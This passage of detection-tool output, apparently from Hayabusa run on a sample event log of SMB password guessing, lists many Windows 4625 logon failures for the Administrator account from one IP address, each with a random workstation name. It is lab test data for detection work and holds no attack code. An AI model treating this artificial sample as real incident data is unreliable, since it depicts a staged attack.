NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZSBbd4qBRuzeKBjD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zS1Muxc9gpcqv23 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c6wiIkfkgtso42P1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1ilRmhSB5RfvpVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PuQ47GGBraimypWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UfUsAYWilbwMScpE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22ZSltGNwIl0DNDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IYwG9IUpdk5DmM8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a8kbGxQFHDBodGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KoLqIaO8p3k9kOkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUnonSx3ZBdkyGhu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d1QJziwKhsaJljGV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZhcNRrpODYB9jZxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yi5JE53caVn7n54w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jx6qTASzFp830ud6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4L8HtBWlmAMTjCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4hVfTwibHreepku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3TlapK211UT8SO0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mzzw3uPkn2cgtmlF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aPnfUjwJei5E5BD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mm1k0eeKAYokIbDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w8TDNcJ3LMyNtUe1 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogKKslkdXvc9f130 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgoy6gMfe5N0UiP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfjf3d6I8TsBOzvc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vs8DG8s81oOwYoI7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LFkgN1aDoYkQ4qrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KMwLokYpcFIYHegd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oKradBV4ERsQnKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qPzlzfmgrbYTKqQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKYlBm2lhobHzbjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DBMu96oqO9tb3f4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tO04Q3eYdzyuy51v : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FrIa2UrSrfdhkDCx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axhhyMrGl95O16Vg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atjvfi8QeEDluhL2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HPBZKUiiKeyQwSr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2SmitfyjO4mxqw5E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nrq1g8ktTQbPTXqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 943GV3t1muba5IQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPVd28zf85AxdGqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D6evoSSxcKkHspuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C4fznmrnIdUH7DzG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwrrYjUV41P0K5Jh : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4RBZrALEnH5BKP9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LU6uWH4gs4iHP7rV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCfhZDAH8ufk77zN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TE9pw4UeRldGeKVc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8PKE05MqxE5TwXT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GIE5fmddOPBbCM3u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pveyo4Czx6KWKCGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zPyyHaRnBec7Qg2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3b8mudJp5mdkiEW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Y6mjLaCzR28Q2qK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dMsNKWEjeCYYQVqw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7c5fENhkwO6QfEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cr1wAeMhPgVpwV82 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErpp9Ww6LO37C9k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYsNpBsGT5zOKe3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgzUk1Dmttm4AQ3s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hp0c3YYyOSJuBHCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gkis4H1MIQPHUwqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lb6mH03qKLb8O7Dz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J10xEmhRNWfJ5FCI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Dujj8A7wwzAwzCp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVDE3fIoUQfLn3cd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UlD48O0XpFUnuSmo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KyTPKuspADmLpv0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BdIAPiH32ZbmCgTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dEiN2xOA4E9Wl5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBeAez2fLjXB0dk3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gQ45aeMDc3Snabvv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWSYdr4lJlhCLMMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgxHY7072aUCdfa0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9yKhEodJDTVCGdIG : IP Address: 192.168.198.149 : AuthPackage: 